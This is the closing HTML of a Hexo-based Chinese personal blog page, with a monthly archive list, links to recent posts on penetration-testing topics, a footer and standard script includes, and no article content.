      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">十一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">十月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">七月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">六月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">五月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/02/">二月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">十二月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">十一月 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/11/21/%E5%92%B1%E5%B0%B1%E6%98%AF%E8%AF%B4%E5%85%B3%E4%BA%8E%E8%BF%99%E4%B8%AAMSF%E4%B8%8A%E7%BA%BF%E7%9A%84%E5%87%A0%E7%A7%8D%E6%96%B9%E5%BC%8F/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/20/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%ADPower%20Shell%E7%9A%84%E4%BD%BF%E7%94%A8/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/20/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/17/%E6%9A%97%E6%9C%88%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA%E9%A1%B9%E7%9B%AE7WP%EF%BC%9A/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/14/msf%20%E8%87%AA%E5%8A%A8%E8%B7%AF%E7%94%B1+sock%E4%BB%A3%E7%90%86%E5%AE%9E%E7%8E%B0%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2021 麦芽糖吖<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>